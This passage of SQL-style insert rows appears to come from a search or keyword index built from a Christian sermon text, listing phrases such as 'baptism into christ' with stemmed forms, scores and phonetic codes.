(271577, 'will you be', 'will you be', 0, 1, 1.3667, 'W410', 1, '*'),
(271578, 'winning the', 'win the', 0, 1, 1.3667, 'W523', 1, '*'),
(271579, 'winning the pleasure', 'win the pleasure', 0, 1, 1.6667, 'W5231426', 1, '*'),
(271580, 'wisdom proverbs', 'wisdom proverbs', 0, 1, 1.5, 'W235161612', 1, '*'),
(271581, 'wisdom proverbs 24', 'wisdom proverbs 24', 0, 1, 1.6, 'W235161612', 1, '*'),
(271582, 'wisdom to', 'wisdom to', 0, 1, 1.3, 'W2353', 1, '*'),
(271583, 'wisdom to approach', 'wisdom to approach', 0, 1, 1.6, 'W2353162', 1, '*'),
(271584, 'wisdom to gather', 'wisdom to gather', 0, 1, 1.5333, 'W2353236', 1, '*'),
(271585, 'with activities', 'with activities', 0, 1, 1.5, 'W323132', 1, '*'),
(271586, 'with activities go', 'with activities go', 0, 1, 1.6, 'W323132', 1, '*'),
(271587, 'with another', 'with another', 0, 1, 1.4, 'W3536', 1, '*'),
(271588, 'with another don\'t', 'with another don', 0, 1, 1.6, 'W3536353', 1, '*'),
(271589, 'with people that', 'with people that', 0, 1, 1.5333, 'W3143', 1, '*'),
(271590, 'with results', 'with results', 0, 1, 1.4, 'W362432', 1, '*'),
(271591, 'with results 1', 'with results 1', 0, 1, 1.4667, 'W362432', 1, '*'),
(271592, 'withdrew', 'withdrew', 0, 0, 0.5333, 'W360', 1, '*'),
(271593, 'withdrew himself', 'withdrew himself', 0, 1, 1.5333, 'W365241', 1, '*'),
(271594, 'withdrew himself to', 'withdrew himself to', 0, 1, 1.6333, 'W3652413', 1, '*'),
(271595, 'without any', 'without any', 0, 1, 1.3667, 'W350', 1, '*'),
(271596, 'without any fruits', 'without any fruits', 0, 1, 1.6, 'W351632', 1, '*'),
(271597, 'work for david', 'work for david', 0, 1, 1.4667, 'W6216313', 1, '*'),
(271598, 'works of the', 'work of the', 0, 1, 1.4, 'W6213', 1, '*'),
(271599, 'yield fruits', 'yield fruits', 0, 1, 1.4, 'Y431632', 1, '*'),
(271600, 'yield fruits it', 'yield fruits it', 0, 1, 1.5, 'Y4316323', 1, '*'),
(271601, 'you a title', 'you a title', 0, 1, 1.3667, 'Y340', 1, '*'),
(271602, 'you are coordinating', 'you are coordinating', 0, 1, 1.6667, 'Y62635352', 1, '*'),
(271603, 'you are winning', 'you are winning', 0, 1, 1.5, 'Y652', 1, '*'),
(271604, 'you be able', 'you be able', 0, 1, 1.3667, 'Y140', 1, '*'),
(271605, 'you could', 'you could', 0, 1, 1.3, 'Y243', 1, '*'),
(271606, 'you could see', 'you could see', 0, 1, 1.4333, 'Y2432', 1, '*'),
(271607, 'you distinct', 'you distinct', 0, 1, 1.4, 'Y323523', 1, '*'),
(271608, 'you distinct don\'t', 'you distinct don', 0, 1, 1.6, 'Y32352353', 1, '*'),
(271609, 'you it\'s', 'you it', 0, 1, 1.2667, 'Y320', 1, '*'),
(271610, 'you it\'s the', 'you it the', 0, 1, 1.4, 'Y323', 1, '*'),
(271611, 'you not disappoint', 'you not disappoint', 0, 1, 1.6, 'Y532153', 1, '*'),
(271612, 'you separate', 'you separate', 0, 1, 1.4, 'Y2163', 1, '*'),
(271613, 'you separate activities', 'you separate activities', 0, 1, 1.7667, 'Y216323132', 1, '*'),
(271614, 'you\'re leading', 'you leading', 0, 1, 1.4667, 'Y64352', 1, '*'),
(271615, 'you\'re leading a', 'you leading a', 0, 1, 1.5333, 'Y64352', 1, '*'),
(271616, 'youas', 'youa', 0, 0, 0.3333, 'Y200', 1, '*'),
(271617, 'youas a', 'youa a', 0, 1, 1.2333, 'Y200', 1, '*'),
(271618, 'youas a reaper', 'youa a reaper', 0, 1, 1.4667, 'Y2616', 1, '*'),
(271619, 'your day', 'your day', 0, 1, 1.2667, 'Y630', 1, '*'),
(271620, 'your day amen', 'your day amen', 0, 1, 1.4333, 'Y635', 1, '*'),
(271621, 'your father\'s', 'your father', 0, 1, 1.4333, 'Y61362', 1, '*'),
(271622, 'your father\'s house', 'your father house', 0, 1, 1.6333, 'Y61362', 1, '*'),
(271623, 'your grace', 'your grace', 0, 1, 1.3333, 'Y6262', 1, '*'),
(271624, 'your grace ability', 'your grace ability', 0, 1, 1.6, 'Y6262143', 1, '*'),
(271625, 'your grace and', 'your grace and', 0, 1, 1.4667, 'Y626253', 1, '*'),
(271626, 'yourself the', 'yourself the', 0, 1, 1.4, 'Y62413', 1, '*'),
(271627, 'yourself the harvest', 'yourself the harvest', 0, 1, 1.6667, 'Y624136123', 1, '*'),
(271628, 'yourself with another', 'yourself with another', 0, 1, 1.7, 'Y62413536', 1, '*'),
(272454, '1 corinthians 10', '1 corinthians 10', 0, 1, 1.5333, 'C65352', 1, '*'),
(272455, '1 romans', '1 romans', 0, 1, 1.2667, 'R520', 1, '*'),
(272456, '1 romans 12', '1 romans 12', 0, 1, 1.3667, 'R520', 1, '*'),
(272457, '10 11-13', '10 11-13', 0, 1, 1.2667, '', 1, '*'),
(272458, '10 11-13 you', '10 11-13 you', 0, 1, 1.4, 'Y000', 1, '*'),
(272459, '11-13', '11-13', 0, 0, 0.5, '', 1, '*'),
(272460, '11-13 you', '11-13 you', 0, 1, 1.3, 'Y000', 1, '*'),
(272461, '11-13 you are', '11-13 you are', 0, 1, 1.4333, 'Y600', 1, '*'),
(272462, '15-16 lukewarm', '15-16 lukewarm', 0, 1, 1.4667, 'L265', 1, '*'),
(272463, '15-16 lukewarm christianity', '15-16 lukewarm christianity', 0, 1, 1.9, 'L265262353', 1, '*'),
(272464, '15-18 as', '15-18 as', 0, 1, 1.2667, 'A200', 1, '*'),
(272465, '15-18 as christians', '15-18 as christians', 0, 1, 1.6333, 'A262352', 1, '*'),
(272466, '16 15-18 as', '16 15-18 as', 0, 1, 1.3667, 'A200', 1, '*'),
(272467, '16 verse', '16 verse', 0, 1, 1.2667, 'V620', 1, '*'),
(272468, '16 verse 18', '16 verse 18', 0, 1, 1.3667, 'V620', 1, '*'),
(272469, '17 this', '17 this', 0, 1, 1.2333, 'T200', 1, '*'),
(272470, '17 this point', '17 this point', 0, 1, 1.4333, 'T2153', 1, '*'),
(272471, '18 the', '18 the', 0, 1, 1.2, 'T000', 1, '*'),
(272472, '18 the bible', '18 the bible', 0, 1, 1.4, 'T140', 1, '*'),
(272473, '19 correct', '19 correct', 0, 1, 1.3333, 'C623', 1, '*'),
(272474, '19 correct christian', '19 correct christian', 0, 1, 1.6667, 'C62326235', 1, '*'),
(272475, '2 corinthians 3', '2 corinthians 3', 0, 1, 1.5, 'C65352', 1, '*'),
(272476, '26-27 speaking', '26-27 speaking', 0, 1, 1.4667, 'S1252', 1, '*'),
(272477, '26-27 speaking in', '26-27 speaking in', 0, 1, 1.5667, 'S12525', 1, '*'),
(272478, '3 15-16', '3 15-16', 0, 1, 1.2333, '', 1, '*'),
(272479, '3 15-16 lukewarm', '3 15-16 lukewarm', 0, 1, 1.5333, 'L265', 1, '*'),
(272480, '3 17 this', '3 17 this', 0, 1, 1.3, 'T200', 1, '*'),
(272481, '6 matthew', '6 matthew', 0, 1, 1.3, 'M300', 1, '*'),
(272482, '6 matthew 28', '6 matthew 28', 0, 1, 1.4, 'M300', 1, '*'),
(272483, '8 26-27', '8 26-27', 0, 1, 1.2333, '', 1, '*'),
(272484, '8 26-27 speaking', '8 26-27 speaking', 0, 1, 1.5333, 'S1252', 1, '*'),
(272485, '9 6 matthew', '9 6 matthew', 0, 1, 1.3667, 'M300', 1, '*'),
(272486, 'a clear understanding', 'a clear understanding', 0, 1, 1.7, 'A246536235352', 1, '*'),
(272487, 'a demon', 'a demon', 0, 1, 1.2333, 'A350', 1, '*'),
(272488, 'a demon possessed', 'a demon possessed', 0, 1, 1.5667, 'A35123', 1, '*'),
(272489, 'a firm', 'a firm', 0, 1, 1.2, 'A165', 1, '*'),
(272490, 'a firm grasp', 'a firm grasp', 0, 1, 1.4, 'A1652621', 1, '*'),
(272491, 'a level', 'a level', 0, 1, 1.2333, 'A414', 1, '*'),
(272492, 'a level of', 'a level of', 0, 1, 1.3333, 'A4141', 1, '*'),
(272493, 'a messenger', 'a messenger', 0, 1, 1.3667, 'A52526', 1, '*'),
(272494, 'a messenger of', 'a messenger of', 0, 1, 1.4667, 'A525261', 1, '*'),
(272495, 'a minister the', 'a minister the', 0, 1, 1.4667, 'A52363', 1, '*'),
(272496, 'a new area', 'a new area', 0, 1, 1.3333, 'A560', 1, '*'),
(272497, 'a new job', 'a new job', 0, 1, 1.3, 'A521', 1, '*'),
(272498, 'a point', 'a point', 0, 1, 1.2333, 'A153', 1, '*'),
(272499, 'a point where', 'a point where', 0, 1, 1.4333, 'A1536', 1, '*'),
(272500, 'a soccer', 'a soccer', 0, 1, 1.2667, 'A260', 1, '*'),
(272501, 'a soccer game', 'a soccer game', 0, 1, 1.4333, 'A2625', 1, '*'),
(272502, 'a soldier that', 'a soldier that', 0, 1, 1.4667, 'A24363', 1, '*'),
(272503, 'a steady', 'a steady', 0, 1, 1.2667, 'A230', 1, '*'),
(272504, 'a steady quiet', 'a steady quiet', 0, 1, 1.4667, 'A2323', 1, '*'),
(272505, 'a stop', 'a stop', 0, 1, 1.2, 'A231', 1, '*'),
(272506, 'a stop to', 'a stop to', 0, 1, 1.3, 'A2313', 1, '*'),
(272507, 'a strong understanding', 'a strong understanding', 0, 1, 1.7333, 'A23652536235352', 1, '*'),
(272508, 'a threat', 'a threat', 0, 1, 1.2667, 'A363', 1, '*'),
(272509, 'a threat to', 'a threat to', 0, 1, 1.3667, 'A363', 1, '*'),
(272510, 'a tool to', 'a tool to', 0, 1, 1.3, 'A343', 1, '*'),
(272511, 'a very long', 'a very long', 0, 1, 1.3667, 'A16452', 1, '*'),
(272512, 'able to carry', 'abl to carry', 0, 1, 1.4333, 'A14326', 1, '*'),
(272513, 'able to cast', 'abl to cast', 0, 1, 1.4, 'A14323', 1, '*'),
(272514, 'able to deceive', 'abl to deceive', 0, 1, 1.5, 'A14321', 1, '*'),
(272515, 'able to follow', 'abl to follow', 0, 1, 1.4667, 'A14314', 1, '*'),
(272516, 'able to guide', 'abl to guide', 0, 1, 1.4333, 'A14323', 1, '*'),
(272517, 'able to operate', 'abl to operate', 0, 1, 1.5, 'A143163', 1, '*'),
(272518, 'able to speak', 'abl to speak', 0, 1, 1.4333, 'A143212', 1, '*'),
(272519, 'able to teach', 'abl to teach', 0, 1, 1.4333, 'A1432', 1, '*'),
(272520, 'about destiny', 'about destiny', 0, 1, 1.4333, 'A13235', 1, '*'),
(272521, 'about destiny purpose', 'about destiny purpose', 0, 1, 1.7, 'A132351612', 1, '*'),
(272522, 'about their', 'about their', 0, 1, 1.3667, 'A136', 1, '*'),
(272523, 'about their situation', 'about their situation', 0, 1, 1.7, 'A136235', 1, '*'),
(272524, 'account jesus', 'account jesus', 0, 1, 1.4333, 'A2532', 1, '*'),
(272525, 'account jesus said', 'account jesus said', 0, 1, 1.6, 'A25323', 1, '*'),
(272526, 'account you', 'account you', 0, 1, 1.3667, 'A253', 2, '*'),
(272527, 'account you must', 'account you must', 0, 1, 1.5333, 'A253523', 1, '*'),
(272528, 'added in', 'ad in', 0, 1, 1.2667, 'A350', 1, '*'),
(272529, 'added in mark\'s', 'ad in mark', 0, 1, 1.5, 'A3562', 1, '*'),
(272530, 'advantage it', 'advantag it', 0, 1, 1.4, 'A315323', 1, '*'),
(272531, 'advantage it givesyou', 'advantag it givesyou', 0, 1, 1.7, 'A315323212', 1, '*'),
(272532, 'alike', 'alik', 0, 0, 0.3333, 'A420', 1, '*'),
(272533, 'alike giving', 'alik giving', 0, 1, 1.4, 'A42152', 1, '*'),
(272534, 'alike giving birth', 'alik giving birth', 0, 1, 1.6, 'A42152163', 1, '*'),
(272535, 'alive in', 'aliv in', 0, 1, 1.2667, 'A415', 1, '*'),
(272536, 'alive in the', 'aliv in the', 0, 1, 1.4, 'A4153', 1, '*'),
(272537, 'all christians', 'all christians', 0, 1, 1.4667, 'A4262352', 1, '*'),
(272538, 'all christians share', 'all christians share', 0, 1, 1.6667, 'A42623526', 1, '*'),
(272539, 'all miracles', 'all miracles', 0, 1, 1.4, 'A456242', 1, '*'),
(272540, 'all miracles but', 'all miracles but', 0, 1, 1.5333, 'A45624213', 1, '*'),
(272541, 'all the commandments', 'all the commandments', 0, 1, 1.6667, 'A43253532', 1, '*'),
(272542, 'all the nations', 'all the nations', 0, 1, 1.5, 'A435352', 1, '*'),
(272543, 'all-out', 'all-out', 0, 0, 0.4667, 'A430', 1, '*'),
(272544, 'all-out war', 'all-out war', 0, 1, 1.3667, 'A436', 1, '*'),
(272545, 'all-out war for', 'all-out war for', 0, 1, 1.5, 'A43616', 1, '*'),
(272546, 'allows god', 'allow god', 0, 1, 1.3333, 'A423', 1, '*'),
(272547, 'allows god to', 'allow god to', 0, 1, 1.4333, 'A423', 1, '*'),
(272548, 'alone a', 'alon a', 0, 1, 1.2333, 'A450', 1, '*'),
(272549, 'alone a christian', 'alon a christian', 0, 1, 1.5667, 'A4526235', 1, '*'),
(272550, 'already doubting', 'alreadi doubting', 0, 1, 1.5333, 'A4631352', 1, '*'),
(272551, 'already doubting the', 'alreadi doubting the', 0, 1, 1.6667, 'A46313523', 1, '*'),
(272552, 'an all-out', 'an all-out', 0, 1, 1.3333, 'A543', 1, '*'),
(272553, 'an all-out war', 'an all-out war', 0, 1, 1.4667, 'A5436', 1, '*'),
(272554, 'an identity', 'an identity', 0, 1, 1.3667, 'A5353', 1, '*'),
(272555, 'an identity crisis', 'an identity crisis', 0, 1, 1.6, 'A5353262', 1, '*'),
(272556, 'and churches', 'and churches', 0, 1, 1.4, 'A53262', 1, '*'),
(272557, 'and churches either', 'and churches either', 0, 1, 1.6333, 'A5326236', 1, '*'),
(272558, 'and confidence', 'and confidence', 0, 1, 1.4667, 'A53251352', 1, '*'),
(272559, 'and confidence that', 'and confidence that', 0, 1, 1.6333, 'A532513523', 1, '*'),
(272560, 'and declare', 'and declare', 0, 1, 1.3667, 'A53246', 1, '*'),
(272561, 'and declare without', 'and declare without', 0, 1, 1.6333, 'A532463', 1, '*'),
(272562, 'and disciple', 'and disciple', 0, 1, 1.4, 'A53214', 1, '*'),
(272563, 'and disciple new', 'and disciple new', 0, 1, 1.5333, 'A532145', 1, '*'),
(272564, 'and driven', 'and driven', 0, 1, 1.3333, 'A53615', 1, '*'),
(272565, 'and driven by', 'and driven by', 0, 1, 1.4333, 'A536151', 1, '*'),
(272566, 'and expectations', 'and expectations', 0, 1, 1.5333, 'A53212352', 1, '*'),
(272567, 'and expectations of', 'and expectations of', 0, 1, 1.6333, 'A532123521', 1, '*'),
(272568, 'and general', 'and general', 0, 1, 1.3667, 'A532564', 1, '*'),
(272569, 'and general commission', 'and general commission', 0, 1, 1.7333, 'A5325642525', 1, '*'),
(272570, 'and have a', 'and have a', 0, 1, 1.3333, 'A531', 1, '*'),
(272571, 'and if we', 'and if we', 0, 1, 1.3, 'A531', 1, '*'),
(272572, 'and kill', 'and kill', 0, 1, 1.2667, 'A5324', 1, '*'),
(272573, 'and kill the', 'and kill the', 0, 1, 1.4, 'A53243', 1, '*'),
(272574, 'and new testament', 'and new testament', 0, 1, 1.5667, 'A53532353', 1, '*'),
(272575, 'and precepts', 'and precepts', 0, 1, 1.4, 'A53162132', 1, '*'),
(272576, 'and precepts of', 'and precepts of', 0, 1, 1.5, 'A531621321', 1, '*'),
(272577, 'and pulpit', 'and pulpit', 0, 1, 1.3333, 'A531413', 1, '*'),
(272578, 'and pulpit alike', 'and pulpit alike', 0, 1, 1.5333, 'A53141342', 1, '*'),
(272579, 'and put a', 'and put a', 0, 1, 1.3, 'A5313', 1, '*'),
(272580, 'and spiritual', 'and spiritual', 0, 1, 1.4333, 'A5321634', 1, '*'),
(272581, 'and spiritual walk', 'and spiritual walk', 0, 1, 1.6, 'A53216342', 1, '*'),
(272582, 'and status that', 'and status that', 0, 1, 1.5, 'A532323', 1, '*'),
(272583, 'and strong enough', 'and strong enough', 0, 1, 1.5667, 'A532365252', 1, '*'),
(272584, 'and teach', 'and teach', 0, 1, 1.3, 'A532', 1, '*'),
(272585, 'and teach them', 'and teach them', 0, 1, 1.4667, 'A53235', 1, '*'),
(272586, 'and the devil', 'and the devil', 0, 1, 1.4333, 'A5314', 1, '*'),
(272587, 'and the holy', 'and the holy', 0, 1, 1.4, 'A534', 1, '*'),
(272588, 'and their', 'and their', 0, 1, 1.3, 'A536', 1, '*'),
(272589, 'and their rights', 'and their rights', 0, 1, 1.5333, 'A536232', 1, '*'),
(272590, 'and they are', 'and they are', 0, 1, 1.4, 'A536', 1, '*'),
(272591, 'and too', 'and too', 0, 1, 1.2333, 'A530', 1, '*'),
(272592, 'and too churchy', 'and too churchy', 0, 1, 1.5, 'A53262', 1, '*'),
(272593, 'and water', 'and water', 0, 1, 1.3, 'A536', 1, '*'),
(272594, 'and water baptism', 'and water baptism', 0, 1, 1.5667, 'A5361325', 1, '*'),
(272595, 'and we shall', 'and we shall', 0, 1, 1.4, 'A5324', 1, '*'),
(272596, 'and your confidence', 'and your confidence', 0, 1, 1.6333, 'A536251352', 1, '*'),
(272597, 'another matter', 'anoth matter', 0, 1, 1.4667, 'A536536', 1, '*'),
(272598, 'another matter entirely', 'anoth matter entirely', 0, 1, 1.7667, 'A5365365364', 1, '*'),
(272599, 'any deadly', 'ani deadly', 0, 1, 1.3333, 'A534', 1, '*'),
(272600, 'any deadly thing', 'ani deadly thing', 0, 1, 1.5333, 'A534352', 1, '*'),
(272601, 'anymore here', 'anymor here', 0, 1, 1.4, 'A560', 1, '*'),
(272602, 'anymore here are', 'anymor here are', 0, 1, 1.5333, 'A560', 1, '*'),
(272603, 'anywhere you', 'anywher you', 0, 1, 1.4, 'A560', 1, '*'),
(272604, 'anywhere you find', 'anywher you find', 0, 1, 1.5667, 'A56153', 1, '*'),
(272605, 'are added', 'ar added', 0, 1, 1.3, 'A630', 1, '*'),
(272606, 'are added in', 'ar added in', 0, 1, 1.4, 'A635', 1, '*'),
(272607, 'are alive in', 'ar alive in', 0, 1, 1.4, 'A6415', 1, '*'),
(272608, 'are all miracles', 'ar all miracles', 0, 1, 1.5333, 'A6456242', 1, '*'),
(272609, 'are his soldiers', 'ar his soldiers', 0, 1, 1.5333, 'A624362', 1, '*'),
(272610, 'are losing', 'ar losing', 0, 1, 1.3333, 'A64252', 1, '*'),
(272611, 'are losing ground', 'ar losing ground', 0, 1, 1.5667, 'A64252653', 1, '*'),
(272612, 'are losing it', 'ar losing it', 0, 1, 1.4333, 'A642523', 1, '*'),
(272613, 'are not the', 'ar not the', 0, 1, 1.3667, 'A653', 1, '*'),
(272614, 'are shallow', 'ar shallow', 0, 1, 1.3667, 'A624', 1, '*'),
(272615, 'are shallow in', 'ar shallow in', 0, 1, 1.4667, 'A6245', 1, '*'),
(272616, 'are too worldly', 'ar too worldly', 0, 1, 1.5, 'A636434', 1, '*'),
(272617, 'area i\'m', 'area i', 0, 1, 1.2667, 'A650', 1, '*'),
(272618, 'area i\'m hundred', 'area i hundred', 0, 1, 1.5333, 'A65363', 1, '*'),
(272619, 'area start', 'area start', 0, 1, 1.3333, 'A62363', 1, '*'),
(272620, 'area start a', 'area start a', 0, 1, 1.4, 'A62363', 1, '*'),
(272621, 'art neither', 'art neither', 0, 1, 1.3667, 'A63536', 1, '*'),
(272622, 'art neither cold', 'art neither cold', 0, 1, 1.5333, 'A63536243', 1, '*'),
(272623, 'as a messenger', 'as a messenger', 0, 1, 1.4667, 'A252526', 1, '*'),
(272624, 'as career', 'as career', 0, 1, 1.3, 'A260', 1, '*'),
(272625, 'as career money', 'as career money', 0, 1, 1.5, 'A265', 1, '*'),
(272626, 'as christians we', 'as christians we', 0, 1, 1.5333, 'A262352', 1, '*'),
(272627, 'assignment in my', 'assign in my', 0, 1, 1.5333, 'A2535', 1, '*'),
(272628, 'at a level', 'at a level', 0, 1, 1.3333, 'A3414', 1, '*'),
(272629, 'at loggerheads', 'at loggerheads', 0, 1, 1.4667, 'A342632', 1, '*'),
(272630, 'at loggerheads with', 'at loggerheads with', 0, 1, 1.6333, 'A3426323', 1, '*'),
(272631, 'at the remaining', 'at the remaining', 0, 1, 1.5333, 'A3652', 1, '*'),
(272632, 'automatically', 'automat', 0, 0, 0.8667, 'A35324', 1, '*'),
(272633, 'automatically if', 'automat if', 0, 1, 1.5333, 'A353241', 1, '*'),
(272634, 'automatically if you', 'automat if you', 0, 1, 1.6667, 'A353241', 1, '*'),
(272635, 'baptism and', 'baptism and', 0, 1, 1.3667, 'B3253', 1, '*'),
(272636, 'baptism and water', 'baptism and water', 0, 1, 1.5667, 'B32536', 1, '*'),
(272637, 'baptism into', 'baptism into', 0, 1, 1.4, 'B3253', 1, '*'),
(272638, 'baptism into christ', 'baptism into christ', 0, 1, 1.6333, 'B32532623', 1, '*'),
(272639, 'baptism these', 'baptism these', 0, 1, 1.4333, 'B32532', 1, '*'),
(272640, 'baptism these baptisms', 'baptism these baptisms', 0, 1, 1.7333, 'B3253213252', 1, '*'),
(272641, 'baptism you', 'baptism you', 0, 1, 1.3667, 'B325', 1, '*'),
(272642, 'baptism you must', 'baptism you must', 0, 1, 1.5333, 'B32523', 1, '*'),
(272643, 'baptisms', 'baptism', 0, 0, 0.5333, 'B3252', 1, '*'),
(272644, 'baptisms include', 'baptism include', 0, 1, 1.5333, 'B32525243', 1, '*'),
(272645, 'baptisms include baptism', 'baptism include baptism', 0, 1, 1.8, 'B325252431325', 1, '*'),
(272646, 'baptize', 'baptiz', 0, 0, 0.4667, 'B320', 1, '*'),
(272647, 'baptize them', 'baptiz them', 0, 1, 1.4, 'B3235', 1, '*'),
(272648, 'baptize them in', 'baptiz them in', 0, 1, 1.5, 'B3235', 1, '*'),
(272649, 'barely', 'bare', 0, 0, 0.4, 'B640', 1, '*'),
(272650, 'barely know', 'bare know', 0, 1, 1.3667, 'B6425', 1, '*'),
(272651, 'barely know what', 'bare know what', 0, 1, 1.5333, 'B64253', 1, '*'),
(272652, 'basic and', 'basic and', 0, 1, 1.3, 'B253', 1, '*'),
(272653, 'basic and general', 'basic and general', 0, 1, 1.5667, 'B2532564', 1, '*'),
(272654, 'be called', 'be called', 0, 1, 1.3, 'B243', 1, '*'),
(272655, 'be called christians', 'be called christians', 0, 1, 1.6667, 'B243262352', 1, '*'),
(272656, 'be called unbelievers', 'be called unbelievers', 0, 1, 1.7, 'B243514162', 1, '*'),
(272657, 'be competent', 'be competent', 0, 1, 1.4, 'B251353', 1, '*'),
(272658, 'be competent and', 'be competent and', 0, 1, 1.5333, 'B25135353', 1, '*'),
(272659, 'be god\'s', 'be god', 0, 1, 1.2667, 'B232', 1, '*'),
(272660, 'be god\'s representatives', 'be god representatives', 0, 1, 1.8, 'B23261625312', 1, '*'),
(272661, 'because it equips', 'becaus it equips', 0, 1, 1.5667, 'B23212', 1, '*'),
(272662, 'because it gives', 'becaus it gives', 0, 1, 1.5333, 'B23212', 1, '*'),
(272663, 'become a threat', 'becom a threat', 0, 1, 1.5, 'B25363', 1, '*'),
(272664, 'become increasingly', 'becom increasingly', 0, 1, 1.6333, 'B25262524', 1, '*'),
(272665, 'become increasingly confused', 'becom increasingly confused', 0, 1, 1.9333, 'B2526252425123', 1, '*'),
(272666, 'become too', 'becom too', 0, 1, 1.3333, 'B253', 1, '*'),
(272667, 'become too fixated', 'becom too fixated', 0, 1, 1.6, 'B253123', 1, '*'),
(272668, 'been empowered', 'been empowered', 0, 1, 1.4667, 'B5163', 1, '*'),
(272669, 'been empowered with', 'been empowered with', 0, 1, 1.6333, 'B5163', 1, '*'),
(272670, 'been engaged', 'been engaged', 0, 1, 1.4, 'B523', 1, '*'),
(272671, 'been engaged in', 'been engaged in', 0, 1, 1.5, 'B5235', 1, '*'),
(272672, 'behavior', 'behavior', 0, 0, 0.5333, 'B600', 1, '*'),
(272673, 'behavior dressing', 'behavior dressing', 0, 1, 1.5667, 'B636252', 1, '*'),
(272674, 'behavior dressing etc', 'behavior dressing etc', 0, 1, 1.7, 'B63625232', 1, '*'),
(272675, 'believe comes', 'believ comes', 0, 1, 1.4333, 'B41252', 1, '*'),
(272676, 'believe comes out', 'believ comes out', 0, 1, 1.5667, 'B412523', 1, '*'),
(272677, 'believe in or', 'believ in or', 0, 1, 1.4333, 'B4156', 1, '*'),
(272678, 'believe me', 'believ me', 0, 1, 1.3333, 'B415', 1, '*'),
(272679, 'believe me just', 'believ me just', 0, 1, 1.5, 'B41523', 1, '*'),
(272680, 'bible has', 'bibl has', 0, 1, 1.3, 'B420', 1, '*'),
(272681, 'bible has to', 'bibl has to', 0, 1, 1.4, 'B423', 1, '*'),
(272682, 'bible says referring', 'bibl says referring', 0, 1, 1.6667, 'B4261652', 1, '*'),
(272683, 'bible shows', 'bibl shows', 0, 1, 1.3667, 'B420', 1, '*'),
(272684, 'bible shows us', 'bibl shows us', 0, 1, 1.4667, 'B420', 1, '*'),
(272685, 'bible study', 'bibl study', 0, 1, 1.3667, 'B423', 3, '*'),
(272686, 'bible study and', 'bibl study and', 0, 1, 1.5, 'B42353', 1, '*'),
(272687, 'bible without', 'bibl without', 0, 1, 1.4333, 'B430', 1, '*'),
(272688, 'bible without knowing', 'bibl without knowing', 0, 1, 1.7, 'B43252', 1, '*'),
(272689, 'birth holy', 'birth holy', 0, 1, 1.3333, 'B634', 1, '*'),
(272690, 'birth holy ghost', 'birth holy ghost', 0, 1, 1.5333, 'B63423', 1, '*'),
(272691, 'birth to', 'birth to', 0, 1, 1.2667, 'B630', 1, '*'),
(272692, 'birth to christians', 'birth to christians', 0, 1, 1.6333, 'B63262352', 1, '*'),
(272693, 'boast of', 'boast of', 0, 1, 1.2667, 'B231', 1, '*'),
(272694, 'boast of a', 'boast of a', 0, 1, 1.3333, 'B231', 1, '*'),
(272695, 'bring forth destruction', 'bring forth destruction', 0, 1, 1.7667, 'B652163236235', 1, '*'),
(272696, 'but it doesn\'t', 'but it doesn', 0, 1, 1.4667, 'B3253', 1, '*'),
(272697, 'but they don\'t', 'but they don', 0, 1, 1.4667, 'B353', 1, '*'),
(272698, 'by how', 'by how', 0, 1, 1.2, 'B000', 1, '*'),
(272699, 'by how well', 'by how well', 0, 1, 1.3667, 'B400', 1, '*'),
(272700, 'by the things', 'by the things', 0, 1, 1.4333, 'B352', 1, '*'),
(272701, 'called christians and', 'call christians and', 0, 1, 1.7, 'C4326235253', 1, '*'),
(272702, 'called unbelievers', 'call unbelievers', 0, 1, 1.6, 'C43514162', 1, '*'),
(272703, 'called unbelievers i', 'call unbelievers i', 0, 1, 1.6667, 'C43514162', 1, '*'),
(272704, 'can be sure', 'can be sure', 0, 1, 1.3667, 'C5126', 1, '*'),
(272705, 'can comfortable', 'can comfortable', 0, 1, 1.5, 'C52516314', 1, '*'),
(272706, 'can comfortable teach', 'can comfortable teach', 0, 1, 1.7, 'C5251631432', 1, '*'),
(272707, 'can spend', 'can spend', 0, 1, 1.3, 'C52153', 1, '*'),
(272708, 'can spend more', 'can spend more', 0, 1, 1.4667, 'C5215356', 1, '*'),
(272709, 'can\'t boast', 'can boast', 0, 1, 1.3667, 'C53123', 1, '*'),
(272710, 'can\'t boast of', 'can boast of', 0, 1, 1.4667, 'C531231', 1, '*'),
(272711, 'career money', 'career money', 0, 1, 1.4, 'C650', 1, '*'),
(272712, 'career money fame', 'career money fame', 0, 1, 1.5667, 'C6515', 1, '*'),
(272713, 'carry out', 'carri out', 0, 1, 1.3, 'C630', 1, '*'),
(272714, 'carry out the', 'carri out the', 0, 1, 1.4333, 'C630', 1, '*'),
(272715, 'cast him', 'cast him', 0, 1, 1.2667, 'C350', 1, '*'),
(272716, 'cast him out', 'cast him out', 0, 1, 1.4, 'C353', 1, '*'),
(272717, 'cast out', 'cast out', 0, 1, 1.2667, 'C300', 1, '*'),
(272718, 'cast out devils', 'cast out devils', 0, 1, 1.5, 'C3142', 1, '*'),
(272719, 'centre of', 'centr of', 0, 1, 1.3, 'C5361', 1, '*'),
(272720, 'centre of the', 'centr of the', 0, 1, 1.4333, 'C53613', 1, '*'),
(272721, 'certain in', 'certain in', 0, 1, 1.3333, 'C635', 1, '*'),
(272722, 'certain in order', 'certain in order', 0, 1, 1.5333, 'C635636', 1, '*'),
(272723, 'chapter 16', 'chapter 16', 0, 1, 1.3333, 'C136', 1, '*'),
(272724, 'chapter 16 verse', 'chapter 16 verse', 0, 1, 1.5333, 'C136162', 1, '*'),
(272725, 'christ the', 'christ the', 0, 1, 1.3333, 'C623', 1, '*'),
(272726, 'christ the new', 'christ the new', 0, 1, 1.4667, 'C6235', 1, '*'),
(272727, 'christian because', 'christian because', 0, 1, 1.5667, 'C623512', 1, '*'),
(272728, 'christian because it', 'christian because it', 0, 1, 1.6667, 'C6235123', 1, '*'),
(272729, 'christian is as', 'christian is as', 0, 1, 1.5, 'C62352', 1, '*'),
(272730, 'christian must be', 'christian must be', 0, 1, 1.5667, 'C6235231', 1, '*'),
(272731, 'christian that doesn\'t', 'christian that doesn', 0, 1, 1.7333, 'C62353253', 1, '*'),
(272732, 'christianity it\'s', 'christian it', 0, 1, 1.5667, 'C623532', 1, '*'),
(272733, 'christianity it\'s doctrines', 'christian it doctrines', 0, 1, 1.9, 'C623532323652', 1, '*'),
(272734, 'christianity there', 'christian there', 0, 1, 1.6, 'C623536', 1, '*'),
(272735, 'christianity there is', 'christian there is', 0, 1, 1.7, 'C6235362', 1, '*'),
(272736, 'christians acts', 'christian acts', 0, 1, 1.5, 'C6235232', 1, '*'),
(272737, 'christians acts 9', 'christian acts 9', 0, 1, 1.5667, 'C6235232', 1, '*'),
(272738, 'christians and churches', 'christian and churches', 0, 1, 1.7667, 'C6235253262', 1, '*'),
